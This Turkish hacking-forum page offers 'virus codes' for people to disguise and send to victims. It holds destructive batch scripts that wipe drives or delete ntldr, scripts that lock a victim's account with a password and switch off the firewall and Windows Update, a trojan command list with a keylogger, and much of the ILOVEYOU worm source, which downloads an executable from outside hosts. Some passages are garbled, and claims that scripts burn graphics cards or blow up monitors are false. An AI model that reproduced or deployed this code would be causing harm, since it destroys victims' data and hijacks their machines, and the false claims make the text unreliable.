C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Hacked By 4-Ever-Hacker::.
@echo off
bu komutu not defterinin içine kopyalayın ve uzantısını bat yapın kendi pc denedim 100%100 çalışıyor bu komutu yazıp karşıya gönderdiğinizde kişi tıklarsa bir daha pc açamaz
format atmak zorunda kalır
Monitör Patlatma
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=<argn1>
local.t_y=<argn2>
sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y**** B<qval <argn3>?<argn3>:<p.z**** W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z**** B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> - 1> D<var.rendermode>
not defterine kopyalayın ve uzantısını bat yapın sakın siz tıklamayın 100%75 çalışıyodur
MasaÜstünü Silme
CD..
CD..
CD.
erase c:/f/s/q/a
not defterine kopyalayın ve uzantısını bat yapın 100%100 çalışıyor
Karşı Pcsinin Oturumuna Şifre Koyma
ilk olarak Not Defterini açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:
net user %username% 123456
shutdown -r
bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekilde kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc’ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmiş olur pc’yi kendisi kapadığıanda şifrelenir açıldığında parola sorar bilen açar bilemeyen açamaz.
100%100 denendi
Karşı Pcsinin Güvenlik Duvarını Kapatma
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
> >"%Temp%.\kill.reg" ECHO.
> >"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
> >"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
****"%Temp%.\kill.reg" ECHO.
> >"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
> >"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
> >"%Temp%.\kill.reg" ECHO.
> >"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
> >"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
> >"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Karşı Pcye Emir Verme Komutları
shutdown -i:Uzaktan Kapat’1 aç
shutdown -l:Oturumu Kapat.
shutdown -s:Bilgisayar1 kpat.
shutdown -r:Bilgisayar1 kapat ve y€niden ßaslat
shutdown -m //bilgisayarad1:Yeniden ba_latmak/ç1kmak için uzak bilg.
shutdown -t xx:kapatmak için bilgisayar1 xx saniyeye ayarla
shutdown -c:Kapatma yorumu en çok<127 karakter>
shutdown -f:Çal1_an uygulamalar1 direkman kapatmaya zorlar
shutdown -d:Kapatma için neden kodu
evet arkadaşlar bunları v€rdik ama şimdi n€ olucak.
başlat-çalıştır-cmd yazın.sonra bu komutlardan birini yazdıktan
sonra yanına arkadaşınızın ıp’sini yazın.sonra yazdığınız komuta
göre işlem görsün.
ip no yazamayı unutmayın
Mail İle Web Site Yıkıcı
phpBBde özel mesaj ile hack yapmak isteyenler bu tam size göre...adminin veya üyenin artık kime atacağınız size kalmış özel mesaj ile atın ve o kişi mesajı okuduğunda bilgileri size gelecek..işte kod..
phpbb de
Kod:
// Save login tries and last login
if (&l036;row[&l039;user_id&l039;] != cookies)
&l123;
&l036;sql = &l039;UPDATE &l039; . USERS_TABLE . &l039;
SET user_login_tries = user_login_tries + 1, user_last_login_try = &l039; . time() . &l039;
WHERE user_id = &l039; . &l036;row[&l039;user_id&l039;];
&l036;db->sql_query(&l036;sql);
}
5.Sayfa Virus Kodları
Bat virüsü hazırlama
İşte kodlar:
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!
örneğin; güzelresimler.bat
sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.
haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.
yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..
panzehir kodları;
shutdown -a
_________________________________________
Yöntem Ms-dostan Pc ye gir
ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi "Programlar>Çalıştır>telnet" yazıp telneti açıyoruz sonra "uzaktaki sistem" deyip adamın ip'sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin...
CaptureScreen Ekrandan goruntu alır
DelFile;(filename.exe) Dosya siler
DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
DisableKeys;0; Klavye tekrar aktif olur
DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir
DownloadFile;(path:filename.exe) istediginiz dosyayi cekersiniz
Eject;1 CD-ROM'u acar
Eject;0 CD-ROM'u kapar
ExitWin;1 Windos'u kapar
GetApps Calısan prg.ları listeler
GetACL Admin Listi verir
GetInfo Info penceresini verir
GetDisks Hardiskindeki dosyaları gosterir
GetSetup Server icin ayarları verir
GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar
KeyClick;1 Key click on
KeyClick;0 Key click off
Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz
Listen;0 Stop listening
Message;(message) Messagebox halinde mesaj yolalrsınız
NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)
Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)
PlaySound;(file.wav) wav dosyası calar
PortRedir;(listen tcp port);(ip);(destination port) ******** the specified port
Record;10 = 10 saniyelik ses kaydeder
RemoveServer;1 Server'ı kaldırır
RemoveServer;0 Kaldırmayı iptal eder
ShowImage;(file.exe) Resim gosterir
SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler
SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]
SetACL;(ip)| Set (admin) access IP`s
SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız
SwapButton;1 Mouse'un tuslarının yerlerini degistirir
SwapButton;0 Mouse'u eski haline getirir
StartApp;(file.exe) Program calıstırır
UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız
_________________________________________
Yöntem Ekran Kartını Yakın
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD By RaZoR::.
@echo off3.
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By RaZoR yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin
_________________________________________
buda Format virüsü karşıya gönderdiğinizde 30sn içinde pc otomatikmen format atıyor ayrıca format atarken ekran kartını yakıp CD-romu bozuyor yani format attıktan sonra tekrardan windowsu geri yüklüyemeyecektir çünkü CD-rom Cd okumuyacaktı yenisini alsa bile yani anlıcayacğınız pc toprak oldu demektir
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
sırada karşıdaki pc ye karşıdakinin haberi olmadan şifre koymak var aşağıdaki kdou .bat çevirip gönderin
net user %username% [parola]
sıradaki kod karşıdakinin ekranını ve msn sini kaptıyor aşağıdaki kodları ne kadar çok yazarsanız karşıdaki pc nin ekranı ve msn si o kadar uzun süre kapanır
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
6.Sayfa Virus Kodları
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
dosyayı notepad a yapıştırdıktan sonra .bat olarak kaydedin virüs hazır..
Evet Arkadaşlar
Bunlarda Zararsız Virus Kodları Sadece Gıcık Eder
Not Defterini Aç
İçine
Shutdown -s -t "6" -c "Pc ni Tamirciye Gönder
yazın ama siz 6 sayısını ve Pc ni Tamirciye Gönder Yazısını Değiştirebilirsiniz
yani 6 sayısı pc nin ne zaman kapanacağıdır Pc ni tamirciye gönder yazısı
ise pc kapanmadan önceki not (mesaj) tur ...
Buda 2. Zararsız Gıcık Edici Bir Vİrus Kodu
Not Defterini Açın
İçine
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
Bat Kodları Ve Virüs Yapımı
Trojan ve Virüsler
 Bat Kodları Ve Virüs Yapımı
1.Notepad 'i açın.
2.Notepad in içine şunları yazın: @echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.* @echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.* @echo off C:\WINDOWS\COMMAND\deltree /y c:\*.* @echo off cls cls @echo .::Seni salak formatı yedin::. @echo off bu komutu not defterinin içine kopyalayın ve uzantısını bat yapın kendi pc denedim 100%100 çalışıyor bu komutu yazıp karşıya gönderdiğinizde kişi tıklarsa bir daha pc açamaz format atmak zorunda kalır evet bu aşağıdaki kodlarda karşı pc nin monitörünü patlatmaya yarar ben denemedim korktum çünkü anlatcaklarımın hepsini denedim ve hepsi çalıştı 90,90 resizepic 0 0 5054 405 470 gumppic 10 10 5528 gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362 text 20 400 455 0 text 20 435 455 01 local.t_x=<argn1> local.t_y=<argn2> sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y>> B<qval <argn3>?<argn3>:<p.z>> W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z>> B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> - 1> D<var.rendermode> not defterine kopyalayın ve uzantısını bat yapın sakın siz tıklamayın 100%75 çalışıyodur evet aşağıdaki komutlar ise karşı pc nin masaüstünü komple siler CD.. CD.. CD. erase c:/f/s/q/a not defterine kopyalayın ve uzantısını bat yapın 100%100 çalışıyor kendi pc karşı bilgisayarın oturmuna şifre koyma ilk olarak Not Defterini açıyoruz sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat) code: net user %username% 123456 shutdown -r bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz şimdii gelelim kullanıma verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekilde kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc’ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmiş olur pc’yi kendisi kapadığıanda şifrelenir açıldığında parola sorar bilen açar bilemeyen açamaz. 100%100 denendi karşı pc nin güvenlik duvarını kapatma @echo off net stop "Security Center" net stop SharedAccess > "%Temp%.\kill.reg" ECHO A R E S >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\kill.reg" DEL "%Temp%.\kill.reg" DEL %0 not defterine kopyalayın ve uzantısını bat yapın 100%100 çalışıyor karşı pc emir verme shutdown -i:Uzaktan Kapat’1 aç shutdown -l:Oturumu Kapat. shutdown -s:Bilgisayar1 kpat. shutdown -r:Bilgisayar1 kapat ve y€niden ßaslat shutdown -m //bilgisayarad1:Yeniden ba_latmak/ç1kmak için uzak bilg. shutdown -t xx:kapatmak için bilgisayar1 xx saniyeye ayarla shutdown -c:Kapatma yorumu en çok<127 karakter> shutdown -f:Çal1_an uygulamalar1 direkman kapatmaya zorlar shutdown -d:Kapatma için neden kodu evet arkadaşlar bunları v€rdik ama şimdi n€ olucak. başlat-çalıştır-cmd yazın.sonra bu komutlardan birini yazdıktan sonra yanına arkadaşınızın ıp’sini yazın.sonra yazdığınız komuta göre işlem görsün. ip yazamayı unutmayın Mail İle Web Site Yıkıcı phpBBde özel mesaj ile hack yapmak isteyenler bu tam size göre...adminin veya üyenin artık kime atacağınız size kalmış özel mesaj ile atın ve o kişi mesajı okuduğunda bilgileri size gelecek..işte kod.. phpbb de Kod: // Save login tries and last login if (&l036;row[&l039;user_id&l039;] != cookies) &l123; &l036;sql = &l039;UPDATE &l039; . USERS_TABLE . &l039; SET user_login_tries = user_login_tries + 1, user_last_login_try = &l039; . time() . &l039; WHERE user_id = &l039; . &l036;row[&l039;user_id&l039;]; &l036;db->sql_query(&l036;sql); ** system 32 silen virüs VİrÜs=İlk Önce Bİr Not Defterİ AÇiyoruz.oraya C:/windows/system32 /deleted Yaziyoruz Farkli Kaydetten .bat A Çevİrİyoruz Önemlİ Not Kesİnlİkle Okumalisiniz=sytem32 KÜÇÜkse KÜÇÜk Yazilir.ben GelİŞİne Öyle Yazdim Tekrar SÖylÜyorum 100%100 denendi karşı pc format at 2 cd.. cd.. attrib -s -h -r -a c:&l92;ntldr del c:&l92;ntldr shutdown -r bu komutları not defterine yapıştırın uzantısını bat yapın
__________________
Her yaptığımız hack daha büyük hacklerin tesellisidir.
|
Kadir Taşkıran – Turkish Information And Security: Işte Tüm Virüs Kodları -Bilgisiyar Güvenliği- Bat Kodları Ve Virüs Yapımı -Rht- Relaxhackteam >>>>> Download Now
YanıtlaSil>>>>> Download Full
Kadir Taşkıran – Turkish Information And Security: Işte Tüm Virüs Kodları -Bilgisiyar Güvenliği- Bat Kodları Ve Virüs Yapımı -Rht- Relaxhackteam >>>>> Download LINK
>>>>> Download Now
Kadir Taşkıran – Turkish Information And Security: Işte Tüm Virüs Kodları -Bilgisiyar Güvenliği- Bat Kodları Ve Virüs Yapımı -Rht- Relaxhackteam >>>>> Download Full
>>>>> Download LINK xq